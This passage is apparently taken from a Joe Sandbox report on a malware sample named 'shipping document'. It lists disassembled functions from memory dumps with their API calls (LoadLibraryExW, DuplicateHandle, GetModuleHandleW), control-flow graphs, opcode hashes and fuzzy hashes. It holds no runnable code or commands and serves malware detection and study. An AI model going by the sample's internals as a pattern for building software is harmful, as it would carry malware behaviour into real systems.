                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0315D677
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 074c006113e51d36834667bc95cc40a298b6340254d914ccb02a36acff613905
                                                                                                • Instruction ID: 35e2d852ceb1a75aafd5da714b490ea54f276c29b63b3b8562c020b8da8f76ad
                                                                                                • Opcode Fuzzy Hash: 074c006113e51d36834667bc95cc40a298b6340254d914ccb02a36acff613905
                                                                                                • Instruction Fuzzy Hash: 7321E4B5901208DFDB10CF9AD984ADEFBF8EB48320F14801AE918A3310D378A940CF65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0315A090 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 537 315a090-315b1c0 539 315b1c2-315b1c5 537->539 540 315b1c8-315b1f7 LoadLibraryExW 537->540 539->540 541 315b200-315b21d 540->541 542 315b1f9-315b1ff 540->542 542->541
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0315AFD9,00000800,00000000,00000000), ref: 0315B1EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 5f5b9756da64a4bbfcf0948b16fe916a251b482af39aa30fcc2dd195e5429675
                                                                                                • Instruction ID: 31a874a290aff2f611df0e2087b58b2f2d2ea9bc04c5c02b1c6627e5fccc0f52
                                                                                                • Opcode Fuzzy Hash: 5f5b9756da64a4bbfcf0948b16fe916a251b482af39aa30fcc2dd195e5429675
                                                                                                • Instruction Fuzzy Hash: F211E7B5904309DFDB10CF9AD884A9EFBF5EB48314F14842AE929A7210C375A545CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0315B178 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 545 315b178-315b1c0 546 315b1c2-315b1c5 545->546 547 315b1c8-315b1f7 LoadLibraryExW 545->547 546->547 548 315b200-315b21d 547->548 549 315b1f9-315b1ff 547->549 549->548
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0315AFD9,00000800,00000000,00000000), ref: 0315B1EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 25e79a37da8d32a2001f0edf16ababd39a7b6e265e2fdc311a67d3138d2fe25c
                                                                                                • Instruction ID: f40ae4cca8040facd6b2e75f6ee748cf4863a247686996511157e0e844ff27c1
                                                                                                • Opcode Fuzzy Hash: 25e79a37da8d32a2001f0edf16ababd39a7b6e265e2fdc311a67d3138d2fe25c
                                                                                                • Instruction Fuzzy Hash: E411E4B6D04249CFDB10CFAAD884ADEFBF5EF49310F14845AE869A7200C375A545CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0315B221 Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0315AFD9,00000800,00000000,00000000), ref: 0315B1EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 76a4466d9504a1472f352f6f277f84bc59f2ba5bbdf62321c0b54307ded682f5
                                                                                                • Instruction ID: 265d5ac6105f2232b2e2796771d394699a23f03d6e569fcbb72817ac380c4e70
                                                                                                • Opcode Fuzzy Hash: 76a4466d9504a1472f352f6f277f84bc59f2ba5bbdf62321c0b54307ded682f5
                                                                                                • Instruction Fuzzy Hash: 4A01F572904344CFDB21CBB9D844BDABFF4AF4A320F08819BE419D7611C3799404CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0315AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0315AF5E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 279ff2c92d189fd48840974c51b0c808ad1b8ef33f90e16741fb0c1ef4f5eb72
                                                                                                • Instruction ID: 586a79da06d1d7450ca2825b25ef9f4983e0b2efa5ba264ec19869707de880be
                                                                                                • Opcode Fuzzy Hash: 279ff2c92d189fd48840974c51b0c808ad1b8ef33f90e16741fb0c1ef4f5eb72
                                                                                                • Instruction Fuzzy Hash: CE11E0B5C00649CFDB10CF9AC544ADEFBF4EF88324F24855AE829A7610C379A545CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5C2F8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: O};5
                                                                                                • API String ID: 0-3558557551
                                                                                                • Opcode ID: 5c6619155f18dbc0ad79d99f37cf33d8d24c83766545d5ba0fd8a22a05e22480
                                                                                                • Instruction ID: b7b2407da53bf87029c4b0ef940e27d39b4b493c3f991963a4cff31af082bd82
                                                                                                • Opcode Fuzzy Hash: 5c6619155f18dbc0ad79d99f37cf33d8d24c83766545d5ba0fd8a22a05e22480
                                                                                                • Instruction Fuzzy Hash: AA416EB0A2420ADFCB84DF99D6858AEBFB1FF89300F60D495D815A7314D731EA51CB14
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5DD88 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8hq
                                                                                                • API String ID: 0-4057917415
                                                                                                • Opcode ID: a8df6c009f4a70d092ec971175504ee5e0f6939fad7c40e71eba0e1d85f76ca8
                                                                                                • Instruction ID: a4f1783f8a184086d88b6cdbaf69d08bee1a9bbaca90f3411ebc13b9e107cf13
                                                                                                • Opcode Fuzzy Hash: a8df6c009f4a70d092ec971175504ee5e0f6939fad7c40e71eba0e1d85f76ca8
                                                                                                • Instruction Fuzzy Hash: 223128B4E04209DFCB44EFA9D5846BEBBB5FB88300F108025D906A7354DB395D81CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5E080 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Tedq
                                                                                                • API String ID: 0-228892971
                                                                                                • Opcode ID: 374e161f63c605dd462cb9afeeae284f1964b00dead0e26732d317178be74f80
                                                                                                • Instruction ID: 3914609e82b9213899cfbf45a55fb7b03f5a5db961535b3b7dd394cb235f9397
                                                                                                • Opcode Fuzzy Hash: 374e161f63c605dd462cb9afeeae284f1964b00dead0e26732d317178be74f80
                                                                                                • Instruction Fuzzy Hash: C3112EB5F0021A8BCB54EBB999506EFB7F6AF89310F504079C904EB354EB328E51CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5ED30 Relevance: .2, Instructions: 167COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a69b73d3e2ab1022d5436a57a99b61cb2d4abe0e4d9b7b499fd7fb24983ec322
                                                                                                • Instruction ID: e148d8e1256258e1ed03fcde5c6ae1972ce35f38edb120276ee0f96dee90287c
                                                                                                • Opcode Fuzzy Hash: a69b73d3e2ab1022d5436a57a99b61cb2d4abe0e4d9b7b499fd7fb24983ec322
                                                                                                • Instruction Fuzzy Hash: 0F611875A10619DFCB14DFA9C494A9DBBF2FF88310F208159E909AF360DB71AE85CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5C480 Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1f0550135a2c6fbc50849376bfaf776d5cb993ac22e26d69a6eb7dcd3a7926df
                                                                                                • Instruction ID: b7e703f0e6667759a85e9870db99cc4e817c8261f20d4d39fd36d22649367009
                                                                                                • Opcode Fuzzy Hash: 1f0550135a2c6fbc50849376bfaf776d5cb993ac22e26d69a6eb7dcd3a7926df
                                                                                                • Instruction Fuzzy Hash: AA415BB4E1020ADFCB04CF99D9819EEBBB2FB89310F10952AE505B7350D7719A91CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5E324 Relevance: .1, Instructions: 105COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1040d5e82b34104b74b3088be68a643d5071e76aa5c242f9d9e4f3f6fc2b31c8
                                                                                                • Instruction ID: 467e7ad218a44b70b69762b7cd8d4b59e28d8897fcb56af50c5da2a41cba39fd
                                                                                                • Opcode Fuzzy Hash: 1040d5e82b34104b74b3088be68a643d5071e76aa5c242f9d9e4f3f6fc2b31c8
                                                                                                • Instruction Fuzzy Hash: 51412AB1D1070A9BCB14DFA9C8446EEFBF5FF98310F14891AD958B7200E774A685CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5E420 Relevance: .1, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9aa42256fa49c65c92e124c2b7f17aa92d2bcceb2aa24005e706580ccfaabf3f
                                                                                                • Instruction ID: e9c66140524599e45393570f33b7b8b5f45e9ca57a01d7cedb96383bd48def7e
                                                                                                • Opcode Fuzzy Hash: 9aa42256fa49c65c92e124c2b7f17aa92d2bcceb2aa24005e706580ccfaabf3f
                                                                                                • Instruction Fuzzy Hash: BE3158B5900209AFCF04DFA9D884A9EBFF9EF48310F10842AE909E7310D735A944CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C56D88 Relevance: .1, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 60013300e9376f8df388ed9fb951f33cd85aeb7bfc7d62eea623af81f0b82ac4
                                                                                                • Instruction ID: 35699081fd0201ac42099e2e3a28b2c1fd74272714246f30504a8a1745e7dd3a
                                                                                                • Opcode Fuzzy Hash: 60013300e9376f8df388ed9fb951f33cd85aeb7bfc7d62eea623af81f0b82ac4
                                                                                                • Instruction Fuzzy Hash: C421AFB9B007169BCB19EB79989847F7BB7FFC42107544829E816D7380EF309E058761
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017BD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1675831012.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_17bd000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: caaa6d20a77afa6baa757dc3b937be873ce14f3afb0ce2a305198b5efb8642f9
                                                                                                • Instruction ID: 89bf52fefb9aae4ca24f45d7aff44a8b33c6bb926b049a619e4beb496f14527e
                                                                                                • Opcode Fuzzy Hash: caaa6d20a77afa6baa757dc3b937be873ce14f3afb0ce2a305198b5efb8642f9
                                                                                                • Instruction Fuzzy Hash: 092136B1104200DFDB25DF88C9C0BA6FF65FB84328F20C5A9ED094B256C33AE446CAA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017BD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1675831012.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_17bd000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a996a6b879fac7df07baafbadae0570a983ade25d3e840edbc9d073b16577ea9
                                                                                                • Instruction ID: 93aa601883983cb8d85f1b7d93cc865e37331f641671b23f2abcf45191e13d93
                                                                                                • Opcode Fuzzy Hash: a996a6b879fac7df07baafbadae0570a983ade25d3e840edbc9d073b16577ea9
                                                                                                • Instruction Fuzzy Hash: 6421F1B1504240DFDB25DF58D9C0B66FF65FB8831CF34C5A9E9090A256C33AD456CAA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017CD01C Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1675962992.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_17cd000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab332f8337de9b40549d6dce51d40d89c6ac02a91053cc6886ec0d5f01aaac24
                                                                                                • Instruction ID: 691c4e42c3752698e0c9cf769dcb6e48f2024605fe0e0f4be28df0b26c3e5d03
                                                                                                • Opcode Fuzzy Hash: ab332f8337de9b40549d6dce51d40d89c6ac02a91053cc6886ec0d5f01aaac24
                                                                                                • Instruction Fuzzy Hash: 0B2103B1604200DFCB25DF58D5C0B26FB65FB84754F20C5BDD90A4B246C336D487CAA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017CD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1675962992.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_17cd000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1f67cae26e677467570b8da9405ada43cb7c197d0b8a3c58e7a686a9a8f96c6f
                                                                                                • Instruction ID: 0cbf408dfb08ff4958d4aa114810c20bf9b1054dbada3c2dabb7d7845f1c04ef
                                                                                                • Opcode Fuzzy Hash: 1f67cae26e677467570b8da9405ada43cb7c197d0b8a3c58e7a686a9a8f96c6f
                                                                                                • Instruction Fuzzy Hash: 6D2129B1508200EFDB25DF98D9C0B26FB66FB84724F24C5BDE9494B252C336D446CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5E718 Relevance: .1, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0fac639dd4eeafffa6742cf2ebeee8a9e4093da7f98bc4c1646dc76b925d1e0
                                                                                                • Instruction ID: db120a8baafaf9d0dcab817565f44b30e0d40823314f2a4ff2d3b64d13740157
                                                                                                • Opcode Fuzzy Hash: a0fac639dd4eeafffa6742cf2ebeee8a9e4093da7f98bc4c1646dc76b925d1e0
                                                                                                • Instruction Fuzzy Hash: FC21D3B0C11258DFDB20CF99C988B8EBFF5BB48314F24805AE804BB240C7B66985CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5C220 Relevance: .1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e71f2dbb1bf2429f8490f571195db3ca6a2027eeaf3db9cfdb315a95f8fc73eb
                                                                                                • Instruction ID: 645a4ef7ca778b93f4ed3bbf242ac58d2ce9ee593bcd9df96642f40e4dad5dd6
                                                                                                • Opcode Fuzzy Hash: e71f2dbb1bf2429f8490f571195db3ca6a2027eeaf3db9cfdb315a95f8fc73eb
                                                                                                • Instruction Fuzzy Hash: 082190B4A10A08DFC744DF5AE589999BFF1FF88310F5280D5E8489B265DB31EA90CB01
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5F9A0 Relevance: .1, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 84d211d859a54ebc63a273e53cd2c1084cc5a8dc16dab472aa78a5e258d9f082
                                                                                                • Instruction ID: 1e4309e11dca41c35a45446ef2659f31ddffd6a6d1e3f912b82855aa7426fb5a
                                                                                                • Opcode Fuzzy Hash: 84d211d859a54ebc63a273e53cd2c1084cc5a8dc16dab472aa78a5e258d9f082
                                                                                                • Instruction Fuzzy Hash: ED1129F4B083489FCB05DBB4CD5566D3BF4EF45200B2508EADC04C7252EA31DE028711
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017BD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1675831012.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_17bd000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                • Instruction ID: c2abeec0b3230dead0305a88bcac91f94373a5a9c1483f70c6a450f4bccc65f3
                                                                                                • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                • Instruction Fuzzy Hash: 1B11DF72404280CFCB12CF54D5C4B56FF72FB84318F24C6A9D8094B656C33AD45ACBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017BD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1675831012.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_17bd000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                • Instruction ID: e831f3d985a14dbe0d00243bb70784a16e3f51683a8884f65dca7274ff55f7a6
                                                                                                • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                • Instruction Fuzzy Hash: EA11CD72404240CFDB12CF44D5C4B96BF62FB84328F2486A9DD090A656C33AE45ACBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5E430 Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ffdadde95ea8526ae5c63c5e517a19dfd9929b22db6257dddc57c2d185e44d8e
                                                                                                • Instruction ID: 80f4479a458f42cebbdef8a7e2e7505377113953c495e632789f1137a2b9521c
                                                                                                • Opcode Fuzzy Hash: ffdadde95ea8526ae5c63c5e517a19dfd9929b22db6257dddc57c2d185e44d8e
                                                                                                • Instruction Fuzzy Hash: 3F2112B5800349EFCB10CF9AC884ADEBBF4FB48320F10841AE919A7310C379A955CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017CD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1675962992.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_17cd000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                • Instruction ID: 71d8b790964e690d256e6bd22da00174ae988f6a25d864a50d1ecacef164cf92
                                                                                                • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                • Instruction Fuzzy Hash: 1E11BE75508240DFDB12CF54C5C0B15FB62FB84724F24C6AED8494B656C33AD44ACB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017CD017 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1675962992.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_17cd000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                • Instruction ID: 7d1fab2ccac356cb88d038441190c7eceff059e3b7808b0e2423121ba0ee5f28
                                                                                                • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                • Instruction Fuzzy Hash: 7611DD75504280DFDB22CF58D5C4B15FFA2FB88714F24C6AED8494B656C33AD48ACBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C567B8 Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 345a4afb82c3af1a55132d25e81df423b71538485f57b5b33626d9113209dda5
                                                                                                • Instruction ID: 415d088ae9f9b85811e93c103e9999cb1e3c999298765f97ce5bcba4e11bdd5a
                                                                                                • Opcode Fuzzy Hash: 345a4afb82c3af1a55132d25e81df423b71538485f57b5b33626d9113209dda5
                                                                                                • Instruction Fuzzy Hash: 26F04FB4D18208DFCB00EFA9D5816BDBBF9EB49740F4090A9D819A3344D7359E84CF84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5A2A0 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2ddb1423077d2e8bffa1402e396c07066cd8c08e93c856fbc6bf8c531391db66
                                                                                                • Instruction ID: 0f1a5f53ac8f0452f76b876e39bb927469a62630ff86c2efee8d3603bf7eb64e
